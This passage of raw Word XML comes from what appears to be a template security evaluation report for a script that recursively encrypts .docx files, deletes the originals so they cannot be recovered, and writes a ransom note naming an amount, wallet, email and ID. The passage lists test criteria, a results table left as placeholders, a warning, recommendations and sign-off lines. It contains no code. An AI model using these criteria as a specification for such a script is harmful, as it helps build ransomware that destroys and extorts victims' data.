        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Test Documents Folder:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>/home/testuser/Documents</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Sample Files:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> 5 .docx files containing the text: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>"This is a test document."</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Network:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Disconnected (air-gapped environment) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5. Evaluation Criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The script will be assessed against the following criteria:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Encryption Integrity:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Verify that encrypted files cannot be opened without the correct passphrase. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>Expected: Encrypted files should produce garbage output when opened in a text editor.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>File Deletion:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Confirm that original .docx files are permanently removed and cannot be recovered using standard file recovery tools. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>README.txt Content:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Verify the ransom note contains all required fields: amount, wallet address, contact email, and unique ID. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Error Handling:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Test script behavior when OpenSSL is missing, when files are read-only, and when the Documents folder does not exist. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Logging:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Ensure all actions are logged with timestamps and success/failure status. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:start="240" w:end="240" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="C00000"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t>CRITICAL SAFETY WARNING:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="24" w:space="12" w:color="C00000"/>
          <w:shd w:fill="F8D7DA" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> This script, if executed in a production environment, will cause irreversible data loss. The evaluation team must ensure that all test data is backed up to a secure, offline location before running this script. Under no circumstances should this script be deployed on live user systems. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>6. Test Results Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11854" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="28" w:type="dxa"/>
          <w:start w:w="28" w:type="dxa"/>
          <w:bottom w:w="28" w:type="dxa"/>
          <w:end w:w="28" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2911"/>
        <w:gridCol w:w="2836"/>
        <w:gridCol w:w="3031"/>
        <w:gridCol w:w="3076"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:suppressLineNumbers/>
              <w:shd w:fill="2E75B6" w:val="clear"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="start"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Encryption of single .docx file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>File encrypted, original deleted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_RESULT_1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS_1}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Recursive encryption (subdirectories)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>All .docx files in subfolders encrypted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_RESULT_2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS_2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>README.txt generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Note contains ransom demand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_RESULT_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS_3}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Error: OpenSSL missing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Script exits with error message</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_RESULT_4}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS_4}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2911" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Secure deletion verification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2836" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>Original files unrecoverable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3031" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_RESULT_5}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3076" w:type="dxa"/>
            <w:tcBorders/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr/>
              <w:t>{PLACEHOLDER_STATUS_5}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7. Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Based on the evaluation results, the following actions are recommended:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Immediate:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> If any test fails, the script must be revised and re-tested before any consideration for use. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:spacing w:before="120" w:after="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Short-term:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Implement additional validation checks for the passphrase strength and file path sanitization. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1134"/>
          <w:tab w:val="left" w:pos="2149" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:start="2149" w:end="1440" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Long-term:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> Evaluate alternative encryption methods that do not require deletion of original files, such as creating encrypted copies with a .enc extension while preserving originals for authorized backup purposes. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="480" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>Approvals:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="480" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>_________________________________________</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>{PLACEHOLDER_NAME}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:br/>
        <w:t>Security Analyst, Evaluation Team</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="480" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>_________________________________________</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>{PLACEHOLDER_MANAGER_NAME}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:br/>
        <w:t>Director of Information Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBodynote"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="480" w:after="120"/>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bdr w:val="single" w:sz="2" w:space="12" w:color="A0A0A0"/>
        </w:rPr>
        <w:t>This document is confidential and intended solely for the use of the security evaluation team. Distribution outside of this team is prohibited without written authorization.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Consolas">
    <w:altName w:val="Courier New"/>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before="1440" w:after="1440"/>
      <w:ind w:start="1440" w:end="1440" w:hanging="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TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="6" w:color="C00000"/>
      </w:pBdr>
      <w:spacing w:before="480" w:after="283"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Sans Unicode MS" w:hAnsi="Liberation Sans Unicode MS"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="2E75B6"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif" w:eastAsia="DejaVu Sans" w:cs="Noto Sans Devanagari"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>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120" w:after="120"/>
      <w:jc w:val="both"/>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2E75B6" w:val="clear"/>
      <w:jc w:val="start"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TextBodynote">
    <w:name w:val="Text Body.note"/>
    <w:basedOn w:val="TextBody"/>
    <w:qFormat/>
    <w:pPr/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5A5A5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